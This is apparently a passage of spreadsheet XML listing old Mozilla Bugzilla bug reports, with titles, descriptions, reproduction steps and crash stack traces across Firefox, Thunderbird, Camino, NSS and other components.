    <t>FIREFOX-334141</t>
  </si>
  <si>
    <t>Javascript menu fails to load when in frame</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.1
Relatively positioned menu does not load when page with target location is embedded inside a frame. The following error is reported in the javascript console:
uncaught exception: Permission denied to set property Window.0
Go to www.rangichangi.com to reproduce. Correct display of menu can be seen in http://dialspace.dial.pipex.com/prod/dialspace/town/pipexdsl/s/asst40/nepalweb.
This menu used to display in a previous version of Firefox and still displays correctly in other browsers I have tested including Mozilla 1.7.6.
Reproducible: Always
Steps to Reproduce:
1. Go to page www.rangichangi.com
2.
3.
Actual Results:  
No menu loaded
Expected Results:  
Menu loads as seen in http://dialspace.dial.pipex.com/prod/dialspace/town/pipexdsl/s/asst40/nepalweb</t>
  </si>
  <si>
    <t>steve_flower</t>
  </si>
  <si>
    <t>CORE-298894</t>
  </si>
  <si>
    <t>[Mac] Clean up the enter key behavior mess</t>
  </si>
  <si>
    <t>Exculding cases like focused-textarea the enter key in native mac dialogs
always fires the default button even if another button is focused.
In dialog.xml we have some sort of hack to make this also happen in our dialog
implementaion (search for enterDefaultAlwyas) however it doesn't work all that
well:
- (In some cases?) both buttons are fired (the focused one and the defualt one).
- When the default button is disabled enter will fire the focused button (it
should never happen). [STR:
  1. Open the add bookmark dialog
  2. Remove the suggested title -&gt; default button is disbaled.
  3. Focus the cancel button and hit enter. -&gt; Dialog is closed.
- Wizards doesn't have the same hack the UE is very different and unexpected.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-485731</t>
  </si>
  <si>
    <t>[silme] 'path' in FileClient.write_object should support both directories and files</t>
  </si>
  <si>
    <t>Created attachment 369841
Patch
I think that all across Silme when working with l10nobjects 'path' is the full path to the file except for the FileClient.write_object class method. This method requires that 'path' point to a directory and than appends the filename via object.id. So if you have a variable with the path to a file you have to os.path.dirname it. Not a major pain but would be nice to unify this.
Proposed patch is attached.</t>
  </si>
  <si>
    <t>CORE-102815</t>
  </si>
  <si>
    <t>ASSERTION: need base URL: 'nsnull != aBaseURL' nsCSSParser.cpp#771</t>
  </si>
  <si>
    <t>1. To reproduce: go to the tinderbox page
2. Click on a 'star'. As the popup comes up you get the assertion.</t>
  </si>
  <si>
    <t>CORE-282108</t>
  </si>
  <si>
    <t>nsURIHashKey.h does not conditionally include</t>
  </si>
  <si>
    <t>There are no 
#ifndef nsURIHashKey_h__
#define nsURIHashKey_h__
..
#endif // nsURIHashKey_h__
guards around nsURIHashKey.h meaning you can get into trouble trying to compile
with certain include structures.</t>
  </si>
  <si>
    <t>CALENDAR-308175</t>
  </si>
  <si>
    <t>Visual indicator in day and week view to show current time (slot)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
In week view and day view a visual indicator positioned in the calendar to show
'where' exact current time is. A coloured bar for instance that changes position
as time changes. In essence a you are here marker where time is the area.
Reproducible: Always</t>
  </si>
  <si>
    <t>carlvonoelreich</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-517201</t>
  </si>
  <si>
    <t>add a the same color as .panel-dark for the .sidebar-spacer</t>
  </si>
  <si>
    <t>Created attachment 401204
Patch
I think this will be beneficial on the user perception side when he quickly moves the content which turn the the toolbar between the locked/unlocked state.</t>
  </si>
  <si>
    <t>SEAMONKEY-421092</t>
  </si>
  <si>
    <t>De-uglify references to prefpane variables</t>
  </si>
  <si>
    <t>Currently we need to reference prefpane variables with document.getElementById('foo_pane').* when they come from XBL which includes the helper app listbox stuff and even the menuitems added to it via JS but also onsyncfrompreference attributes that actually get called through the toolkit preference XBL. We should look into de-uglification of that as Neil named it in review comments to bug 417590.</t>
  </si>
  <si>
    <t>CORE-367467</t>
  </si>
  <si>
    <t>Allow inputstream generation at the end of data in a storage stream</t>
  </si>
  <si>
    <t>Created attachment 252027
Patch
var stream = create an empty storage stream somehow...
stream.getOutputStream(0).write(foo 3)
stream.getInputStream(3) // throws exception
The above code fails for a couple reasons: most obviously  and second the uninitialization of segment buffers when the storage stream contains 0 bytes (either with no writes or with an explicit 0 write) after the first condition is changed.
This patch fixes this so that you can get an input stream for a storage stream whenever the given position is less than or equal to the amount of data in the stream -- so long as data has been written explicitly even if the amount of data written was 0 bytes.  It does not allow a getOutputStream(0) immediately followed by a getInputStream(0) which I attempted to implement but finally abandoned as more trouble than it was worth and more than likely behavior the author would consider a bug.  (Note that there *is* a use case for writing 0 and then getting an inputstream from position 0 -- see the URL field.)</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-334528</t>
  </si>
  <si>
    <t>xulrunner-stub requires msvcrt71.dll if xulrunner is built using vc7.1</t>
  </si>
  <si>
    <t>xulrunner-stub requires msvcrt71.dll if xulrunner is built using vc7.1
this means that we may need to copy msvcrt71.dll around when we install xulrunner apps using xulrunner --install-app ... or maybe there is a better solution.</t>
  </si>
  <si>
    <t>SEAMONKEY-252795</t>
  </si>
  <si>
    <t>Folder/Newsgroup Properties dialog has no access keys</t>
  </si>
  <si>
    <t>SEAMONKEY-30221</t>
  </si>
  <si>
    <t>Tab order problem in basic auth username &amp; password box</t>
  </si>
  <si>
    <t>Having typed in the username when I tab I do not end up in the password field.
There is no indication if any of the visible component has focus but the 
username password and check box do not.
I am using build 2000030215
on NT 4 SP3</t>
  </si>
  <si>
    <t>howdens</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-464515</t>
  </si>
  <si>
    <t>ka / Georgian</t>
  </si>
  <si>
    <t>[ka] Backport about:rights to 3.0.5</t>
  </si>
  <si>
    <t>You're receiving this email because your about:rights has been translated.  Please let us know in this bug when you consider the translation vetted and ready for non-beta use.  We look forward to hear from you.  You just need to give us the OK to backport and we will do that when ready.
You can indicate that your version is ready for backporting by setting the url of this bug to a link to you repository's browser/chrome/browser dir with the revision to import as in this example for German:
http://hg.mozilla.org/l10n-central/de/file/dda524a74899/browser/chrome/browser/
FYI: you can find the updated release schedule for Firefox 3.0.5 here:
https://wiki.mozilla.org/Releases/Firefox_3.0.5#Schedule
Because we are making localization changes to about:rights in this release the l10n-team will back-port all l10n translations from Hg to CVS for Firefox 3.0.5 (Gecko 1.9.0.5) after the freeze date of November 28 at 11:59 PM (Mountain View Time).  
It obviously benefits us if you can let us know as soon as possible but we know how busy you are so please let us know if/how we can help.  (We will begin our back-porting after November 17.)</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-465101</t>
  </si>
  <si>
    <t>WINNT 5.2 mozilla-central nightly box is in flames</t>
  </si>
  <si>
    <t>No nightly is being produced for win32 right now because the WINNT 5.2 box is red.</t>
  </si>
  <si>
    <t>TOOLKIT-222829</t>
  </si>
  <si>
    <t>crash at nationstates.net after using password manager to select appropriate password and submitting it from particular page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5) Gecko/20031007 Firebird/0.7
In the page at http://www.nationstates.net when one has multiple logins after
selecting one and submitting on a particular page the browser crashes.
Reproducible: Always
Steps to Reproduce:
1. Create an account at http://nationstates.net
2. Login to said account.
3. Repeat steps 1 and 2.
4. Go to the issues page.
5. Select an answer to an issue.
6. Attempt to login to another account on the site.
Actual Results:  
Firebird crashed.
Expected Results:  
Firebird should have taken me to the next page without any problems.
Tab Browser Extensions is installed.
I do not have the Quality Feedback Agent installed.</t>
  </si>
  <si>
    <t>johnleemk</t>
  </si>
  <si>
    <t>CCK_GRAVEYARD-2786</t>
  </si>
  <si>
    <t>Merge user.js program: Not correct out.js file is created.</t>
  </si>
  <si>
    <t>Steps:
1. Modify addition.js file so that it includes the preference name and value but
the valus is not specified in the format as required. (an extra spaces are
specified)
Result:
Out.js file is created that is not complete.</t>
  </si>
  <si>
    <t>bsharma</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-383545</t>
  </si>
  <si>
    <t>Are you sure you want to quit? dialog dismissal button should read Don't Quit</t>
  </si>
  <si>
    <t>Per that ages-old UI guideline we should change the Cancel button in this dialog to read Don't Quit since Don't Quit is the action it actually performs and the dialog already mentions cancel in the sense of that's what's going to happen to your downloads if you quit. Spun off from bug 364624.</t>
  </si>
  <si>
    <t>CORE-499554</t>
  </si>
  <si>
    <t>Poor video/audio quality even on powerful PC probably due to our buffering logic</t>
  </si>
  <si>
    <t>Poor video/audio quality even on powerful PC probably due to our buffering logic
I see this on certain videos 
let me write what I see.
VIDEO 1
(part A)
1. goto http://tinyvid.tv/show/2wn7rkzapa2ci
2. do right-click &gt; view video
3. press pause
4. wait till video buffering process stop
   - even though video is only 31.4MB 
     it stop buffering around 7 minutes on the scroll bar
5. click play button on video 
   - Actual: video plays with disturbance in audio and with skipping
   - Expected : video play properly
(part B)
6. click pause
7. move the scrollbar towards end of buffered video 
   but still inside buffered range
   (move it by clicking rather than dragging)
8. wait for video to buffer completely
9. move scroll bar to START 
10. Click Play
   - Actual: Video plays without any problem on a powerful PC
VIDEO 2
(part A)
1. goto http://tinyvid.tv/show/asjek24g00ww
2. wait for video buffering process stop
3. click play
4. wait till 25 to 30 minutes playback
   - Actual: some where after 25 minutes video/audio quality goes bad
   - Expected : video play properly
(part B)
5. click pause
6. make video buffer for complete length
   as explained in VIDEO 2 part B
7. bring the scrollbar to same place where there was problem
8. click play
   - Actual: Video plays without any problem on a powerful PC</t>
  </si>
  <si>
    <t>TOOLKIT-56644</t>
  </si>
  <si>
    <t>one-time large leak in wallet</t>
  </si>
  <si>
    <t>The first time I submit a form wallet allocates the following objects that are
never freed:
 * 144K of nsStr (excluding their buffers!)
 * 173K of wallet_MapElement
 * 12K of wallet_Sublist
If these objects are meant to last the life of the component then they should
be freed in wallet's module destructor so they don't clutter up the leak stats. 
If they're not then they should be deleted sooner.
The latter two objects should also be added to the leak stats.  I'll attach a
patch for review that does that.
STEPS TO REPRODUCE:
 * load this page
 * hit commit (without changing anything!)</t>
  </si>
  <si>
    <t>THUNDERBIRD-253673</t>
  </si>
  <si>
    <t>empty subjects shows up as null in the title bar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: 0.7.2
An empty subjects shows up as null in the title bar.
Reproducible: Always
Steps to Reproduce:
1. Open a message with no subject
Actual Results:  
Title window should contain (no subject) or nothing
Expected Results:  
Title window contains null</t>
  </si>
  <si>
    <t>CORE-415491</t>
  </si>
  <si>
    <t>Make UnEscapeURIForUI escape bidirectional formatting characters</t>
  </si>
  <si>
    <t>The patch for bug 388372 made Firefox's nsIXULBrowserWindow::setOverLink implementation re-encode any bidi formatting characters per RFC 3987 sections 3.2 and 4.1 paragraph 6. Should this be done by UnEscapeURIForUI instead? That would fix this problem in a more general way.</t>
  </si>
  <si>
    <t>THUNDERBIRD-315091</t>
  </si>
  <si>
    <t>Thunderbird crashes when using filter to forward mail [@ msg_pick_real_name]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.8) Gecko/20051025 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.8) Gecko/20051025 Firefox/1.5
I tried setting up a filter on a mailbox to forward mail to a Gmail account then used the Run now button. If the filter criteria found only a few matching mails it went as expected. If more than 10 (approx) mails were found by the filter Thunderbird crash and the Feedback Agent appear. The filter log show all mails that matched the filter criteria.
Reproducible: Always
Steps to Reproduce:
1. Set up a filter IF Subject isn't  THEN forward to 
2. Run the filter on a folder
3.
Actual Results:  
Crash Dr. Watson and the Feedback Agent
Expected Results:  
Mails meeting the filter criteria should have been forwarded to the target address</t>
  </si>
  <si>
    <t>chris-moz</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-481146</t>
  </si>
  <si>
    <t>[E-1.2.1] Cookie Lookup</t>
  </si>
  <si>
    <t>If the user is logged into AMO and has a valid session cookie that session should be used for Bandwagon activities.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-452261</t>
  </si>
  <si>
    <t>Please update MDC skin from SVN to revision 17948</t>
  </si>
  <si>
    <t>Need to update the MDC skin to revision 17947.  This fixes a bug that broke the link to the page with copyright information for the site so it's fairly important to get this up as soon as possible.  Thanks!</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-399048</t>
  </si>
  <si>
    <t>Add accesskeys to all buttons make Get Certificate the default button (Add Exception dialog)</t>
  </si>
  <si>
    <t>We must add accesskey to all buttons in the new dialog that we added with bug 387480.
Bob proposed the default button should be the get cert button.
Requesting blocking1.9 as this is a usability issue with the new UI.</t>
  </si>
  <si>
    <t>CORE-384760</t>
  </si>
  <si>
    <t>surroundContents with a newly created node loses parentNode on surrounded node</t>
  </si>
  <si>
    <t>Created attachment 268661
testcase
The attached test case creates a new hbox element and tries to wrap it around a description element.  I read the DOM Range specification to say the hbox element should be the parent node of the description element.
http://www.w3.org/TR/2000/REC-DOM-Level-2-Traversal-Range-20001113/ranges.html#Level-2-Range-Surrounding
Reference point 3 where it says:
Insert the entire contents of the extracted DocumentFragment into newParent. Specifically invoke the appendChild() on newParent passing in the DocumentFragment returned as a result of the call to extractContents()</t>
  </si>
  <si>
    <t>SOCORRO-484691</t>
  </si>
  <si>
    <t>after getting query results clicking advanced filter annoyingly selects first version in selection list</t>
  </si>
  <si>
    <t>after getting filter results annoyingly selects first version in selection list. there are variations 
trivial example 
1. do a filter firefox version=3.0.7. with no other selections
results: results screen gives correct results but 3.0.0 is selected in the filter section
irrc another variation goes like ...
select Thunderbird select a version click advanced putin a signature filter results are good - now click Advanced Filters - version gets reset to Firefox 3.0</t>
  </si>
  <si>
    <t>BUGZILLA-82309</t>
  </si>
  <si>
    <t>README updates.</t>
  </si>
  <si>
    <t>Here's a few important globules to add to the README.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-371270</t>
  </si>
  <si>
    <t>Keychain can fill in username/password that doesn't match data prefilled by JavaScript</t>
  </si>
  <si>
    <t>In another bug we mentioned that we shouldn't let the Keychain fill in data when what it wants to fill doesn't match the existing username.
I've just run into a scenario where this happens:
I just a got a new account ID/password at investools so yesterday I logged in with the new details.  My cookie got updated with new values and I told Camino to update the existing Keychain entry with the new values.  Today I came back to log-in and the cookie prefilled the new username/password and then I got the Allow Camino to access the Keychain prompt and after allowing the entries in the login form were now replaced by the old username/password (which were somehow preserved in the Keychain instead of updated bug to follow on that).</t>
  </si>
  <si>
    <t>SEAMONKEY-214134</t>
  </si>
  <si>
    <t>No need to define MOZ_ENABLE_COREXFONTS on windows</t>
  </si>
  <si>
    <t>MOZ_ENABLE_COREXFONTS doesn't do anything for windows builds so don't bother
defining it.</t>
  </si>
  <si>
    <t>mozbugs-build</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-428427</t>
  </si>
  <si>
    <t>Unread count in virtual folders not updated for changed headers</t>
  </si>
  <si>
    <t>I can see there are lots of existing bugs that deal with issues of unread counts and saved searches but I'm approaching this from the code perspective and none seem to indicate exactly what I want to fix.
The symptom: When I add filters associated with junk processing particularly the filters in bug 414179 saved searches using those filters do not maintain the correct unread count.
Steps to reproduce:
1) Apply patch for bug 414179
2) Add a filter called uncertain with a junkpercent between 50 and 90
3) Receive an email with a junkpercent in that range.
Expected behavior: the unread count for the virtual folder is correct.
Actual behavior: the unread count for the virtual folder is not updated until you click on the virtual folder.
The problem occurs in VirtualFolderChangeListener::OnHdrChange  The changed value of junkpercent is properly reported but that routine is only capable of processing changes that occur in message status or flags. Other changes are ignored.
OnHdrChange needs to know both the old header and the new header to correctly calculate the count changes for the folder. Unfortunately that information is not currently available. What I propose to do is to modify the upstream functions up to NotifyHdrChangeAll so that both the old header and the new header are passed down the chain.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-448098</t>
  </si>
  <si>
    <t>Weave 0.2.x breaks stealther extension</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: 0.2.5
https://addons.mozilla.org/en-US/firefox/addon/1306
They did work together pre weave 0.2.x but since upgrading weave I've realized stealther hasn't worked.
Reproducible: Always
Steps to Reproduce:
1.install both weave and stealther
2.try and enable stealther - you can't
3.Disable Weave and stealther works fine</t>
  </si>
  <si>
    <t>bill.hedworth</t>
  </si>
  <si>
    <t>CALENDAR-379268</t>
  </si>
  <si>
    <t>Fix for isDefaultCalendar and install.rdf changes</t>
  </si>
  <si>
    <t>Created attachment 263261
fix v1
This fix is required to avoid an error when creating an item where the calendar is not set on the item passed to adoptItem (i.e drag to create). This might actually be something that should be fixed at a higher level but since that will not make the 0.5 release I would like to have it fixed also here.
Also I have bumped the version to 0.2 in install.rdf changed the versions for amo and fixed a typo where the rdf:Description tag had the wrong case. I hope its ok to put those changes in here I felt this change is so trivial that it doesn't require an extra bug.</t>
  </si>
  <si>
    <t>TOOLKIT-419357</t>
  </si>
  <si>
    <t>nsIExtensionManager::getInstallLocation can sometimes returns null (not expected/documented)</t>
  </si>
  <si>
    <t>nsIExtensionManager::getInstallLocation returns null in various instances:
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/toolkit/mozapps/extensions/src/nsExtensionManager.js.in&amp;rev=1.275&amp;mark=4137-413941624188#4114
This isn't documented:
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/toolkit/mozapps/extensions/public/nsIExtensionManager.idl&amp;rev=1.55&amp;mark=242-248#242
Given that I believe the generally accepted xpcom rules are that you don't return null but throw an error either we need to fix the code or fix the documentation. I don't mind which but would prefer the code as this has caused at least one crash (http://crash-stats.mozilla.com/report/index/94fb6970-db1d-11dc-96c0-001a4bd43ed6) due to the assumption that checking the nsresult is enough.</t>
  </si>
  <si>
    <t>TESTOPIA-485204</t>
  </si>
  <si>
    <t>Combo box for selecting Environments shows all Environments instead of only active ones</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Build Identifier: Testopia 2.2 with Bugzilla 3.2.2
When the user creates a new test run or clones an existing one the Environment combo box should only show active Environments.  Instead it shows all Environments regardless of whether they are active or not.
Reproducible: Always
Steps to Reproduce:
1. Click New Run.
2. Choose your test plan and click Submit.
3. Click the Environments combo box.
Actual Results:  
A drop down menu appears with a list of every Environment.
Expected Results:  
A drop down menu appears with a list of active Environments only.
The fix for this will probably be along the same lines as bug 457762 which was the exact same issue with the Builds instead of the Environments.  I am experiencing this problem in both the Clone and New Run windows.</t>
  </si>
  <si>
    <t>dadarabbit</t>
  </si>
  <si>
    <t>FIREFOX-484221</t>
  </si>
  <si>
    <t>onDeleteURI of nsINavHistoryObserver does not fire when deleting more than 10 entries at once</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 de rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 de rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
When deleting less than 10 entries from the history sidebar at once nsINavHistoryObserver:onDeleteURI() fires for every entry.
But when deleting more than 10 entries from the sidebar at once onDeleteURI() doesn't fire at all only onBeginUpdateBatch() fires.
Reproducible: Always</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-467773</t>
  </si>
  <si>
    <t>Change repetitive wording of link handling dialogue</t>
  </si>
  <si>
    <t>Working on the Swedish translation of Camino 2.0 I found the following string:
Camino cannot open â€œ%@â€ links and there are no applications installed that can open â€œ%@â€ links.
The wording is kind of repetitive and I think a better one would be:
Camino cannot open â€œ%@â€ links and there are no other applications installed that can open them.</t>
  </si>
  <si>
    <t>CORE-367103</t>
  </si>
  <si>
    <t>speed up filter calculations</t>
  </si>
  <si>
    <t>Created attachment 251617
patch
Use temporaries for repeated calculations.
Use FAST_DIVIDE_BY_255.
Move constants out of loops.</t>
  </si>
  <si>
    <t>CORE-224832</t>
  </si>
  <si>
    <t>{inc} element with properties { position: absolute right: 0 } nested in an relative pos. inline element is displayed oddly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3.1) Gecko/20030428
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.3.1) Gecko/20030428
.parent { position: relative display: inline border: solid 1px red }
.child { position: absolute right: 0 border: solid 1px blue }
abcdef x 
The child element should be on the right side inside the parent element. Mozilla
handle the child element oddly when the parent is an inline element (display:
inline). If the parent is a block element (display: block) everything seems to
be OK.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>chudoba</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-150034</t>
  </si>
  <si>
    <t>microsoft.com - left edge of text is outside left edge of window content area</t>
  </si>
  <si>
    <t>Using Moz RC3 on WinXP Pro. 
To repro: view above page in Moz RC3 then in IE6. Looks fine in IE6 and Nav4
but in Moz I can't read the leftmost character on every line because the left
margin is being positioned outside the left edge of the window's content area.
Interesting that MS appears to be using markup that looks fine in IE and Nav4
but just happens to be unreadable in Mozilla.
Suspect that something in this stylesheet might be at fault:
... which resolves to this URL:
http://www.microsoft.com/windows/windowsmedia/css/WinNN.css</t>
  </si>
  <si>
    <t>ericweb</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-287969</t>
  </si>
  <si>
    <t>NS_IMETHODIMP AddShellToCacheForHost should not return PRBools</t>
  </si>
  <si>
    <t>of course the only consumer doesn't bother to check the rv anyway.
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/mailnews/imap/src/nsImapServerResponseParser.cpp&amp;rev=1.122&amp;mark=487-488#479</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-304760</t>
  </si>
  <si>
    <t>gaf.com - Page text shown too far to the left as opposed to other browsers</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
In Firefox the page text is rendered at the left edge of the page which
overlaps the red bar running down the left edge of the page making it hard to read.
In IE6 the red bar is still there but the text is shown indented a bit which
makes it easier to read.
Looking at the source of the page there might be an issue with tables and
perhaps the leftmargin attribute though that's just a guess.
Reproducible: Always
Steps to Reproduce:
1. Visit URL listed
2. Observe red bar long left hand edge
3. Observe text overlaid on top of the red bar instead of being indented
Actual Results:  
I saw that the text was rendered on top of a red bar along left hand edge of the
page making it difficult to read.
Expected Results:  
The text should have been indented a certain amount as shown by IE.</t>
  </si>
  <si>
    <t>hgohel</t>
  </si>
  <si>
    <t>TOOLKIT-281192</t>
  </si>
  <si>
    <t>Mousewheel scroll on tabbar should change tab</t>
  </si>
  <si>
    <t>GNOME 2.10 does this for all tabs - in pref dialogs epiphany gedit etc. It
also enables it for the virtual desktop selector and other small things.
I see nothing wrong with doing this in Firefox as well despite bug 108524.
However I'm not reopening that bug since it suggested a pref -- which I'm not.
Initial patch in a minute.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-387755</t>
  </si>
  <si>
    <t>Reset LDAP password for Kalman Kemenczy</t>
  </si>
  <si>
    <t>Please reset the password for the following account:
Name: Kalman Kemenczy
email: kkemenczy@novell.com
Thanks</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-349725</t>
  </si>
  <si>
    <t>fix bonsai xml file list returning</t>
  </si>
  <si>
    <t>The last file in any file list is skipped so checkins with just one file 
Off by one error because perl is hard.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-485673</t>
  </si>
  <si>
    <t>One-way sync wipes non-enabled engines</t>
  </si>
  <si>
    <t>Using the sync dialog to choose a one-way sync will wipe all client or server data ignoring whether engines are enabled or not.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-113361</t>
  </si>
  <si>
    <t>[mach] inspector fails to build on OSX mach-o</t>
  </si>
  <si>
    <t>inspector fails to build on OSX mach-o [planetoid tinderbox]
looks like a link error.</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-480992</t>
  </si>
  <si>
    <t>chrome height jumps when persona is selected or previewed</t>
  </si>
  <si>
    <t>Since the checkin for bug 459263 the height of toolbar chrome has started jumping again when the default persona is active and a persona is selected or previewed. The fix for bug 459263 turned off moz-appearance for toolbarbuttons to remove their native backgrounds in the process it probably also removed native margin border and/or padding rules causing buttons to now have a different total height.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-350385</t>
  </si>
  <si>
    <t>Wordpress doesn't escape Ampersands in post RSS feeds</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
RSS of MDC devnews (http://developer.mozilla.org/devnews/?feed=rss) is not well-formed XML currently. &amp; in contents is not escaped.
they should be escaped in XML/RSS.
Reproducible: Always
Steps to Reproduce:
1.view http://developer.mozilla.org/devnews/?feed=rss
Actual Results:  
error from RSS/XML viewer
Expected Results:  
RSS/XML should be well-formed</t>
  </si>
  <si>
    <t>shimono</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-296972</t>
  </si>
  <si>
    <t>Update service behaves badly with unset prefs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.8b2) Gecko/20050607 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.8b2) Gecko/20050607 Firefox/1.0+
Running xulrunner (nightly as of 6/7/05) enters 100% CPU-mode failing to update
from a null URL since it sets a timeout with a null interval so it creates a 0
interval timer.
Std Error:
../../../dist/bin/xulrunner ../../../dist/xpi-stage/emr/application.ini 
==================*** interval = undefined
*** downloadUpdate
***
/home/readams/mozilla/obj-x86_64-unknown-linux-gnu/dist/bin/updates/0/update.status
*** no patch to download
*** update url: null
[last line repeated infinitely]
Logged to the console (repeated infinitely):
 [JavaScript Error: [Exception... Component returned failure code: 0x80004005
(NS_ERROR_FAILURE) [nsIXMLHttpRequest.open]  nsresult: 0x80004005
(NS_ERROR_FAILURE)  location: JS frame ::
file:///home/readams/mozilla/obj-x86_64-unknown-linux-gnu/dist/bin/components/nsUpdateService.js
:: anonymous :: line 697  data: no] {file:
file:///home/readams/mozilla/obj-x86_64-unknown-linux-gnu/dist/bin/components/nsUpdateService.js
Reproducible: Always</t>
  </si>
  <si>
    <t>NSS-347450</t>
  </si>
  <si>
    <t>FIPS 140-2 requirements on key zeroization</t>
  </si>
  <si>
    <t>NSS always calls memset to clear the memory holding private
keys secret keys and passwords after use.  This is a good
security practice but is not necessarily required to pass
FIPS 140-2 validation.  In this bug I describe the applicable
FIPS 140-2 requirements are expressly concerned with key zeroization.
It turns out that for a cryptographic module like NSS that
is validated at Security Levels 1 and 2 and doesn't have a
maintenance role there is only one applicable FIPS 140-2
requirement on key zeroization.
  AS07.41: (Levels 1 2 3 and 4) The cryptographic module
  shall provide methods to zeroize all plaintext secret and
  private cryptographic keys and CSPs within the module.
For NSS we can interpret and CSPs as and passwords/PINs.
Since password-based encryption is not FIPS Approved our
key database's contents are considered in plaintext form
even though we password-encrypt the contents using PKCS #5.
Note that this requirement does not specify *when* the module
should zeroize a plaintext secret key private key or
password/PIN.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-440190</t>
  </si>
  <si>
    <t>crash importing outlook contact csv data file [@ nsTextAddress::GetField]</t>
  </si>
  <si>
    <t>crash importing outlook contact csv data file [@ nsTextAddress::GetField]
TB46349145 and
TB44833177
Stack Signature	nsTextAddress::GetField 761289f0
Product ID	Thunderbird2
Build ID	2008042104
Operating System	Windows NT 5.1 build 2600
User Comments	Repeatedly clicking next in the process of importing contacts from a csv outlook exported file trying to get to a contact where I can match up phone number email etc.
Source File Line No.	e:/builds/tinderbox/Tb-Mozilla1.8-Release/WINNT_5.0_Depend/mozilla/mailnews/import/text/src/nsTextAddress.cpp line 344
Stack Trace 	
nsTextAddress::GetField  [mozilla/mailnews/import/text/src/nsTextAddress.cpp line 344]
ImportAddressImpl::GetSampleData  [mozilla/mailnews/import/text/src/nsTextImport.cpp line 681]
nsImportGenericAddressBooks::GetData  [mozilla/mailnews/import/src/nsImportAddressBooks.cpp line 304]
XPTC_InvokeByIndex  [mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp line 102]
XPCWrappedNative::CallMethod  [mozilla/js/src/xpconnect/src/xpcwrappednative.cpp line 2169]
XPC_WN_CallMethod  [mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp line 1455]
js_Invoke  [mozilla/js/src/jsinterp.c line 1384]
js_Interpret  [mozilla/js/src/jsinterp.c line 3955]
js_Invoke  [mozilla/js/src/jsinterp.c line 1403]
js_InternalInvoke  [mozilla/js/src/jsinterp.c line 1478]
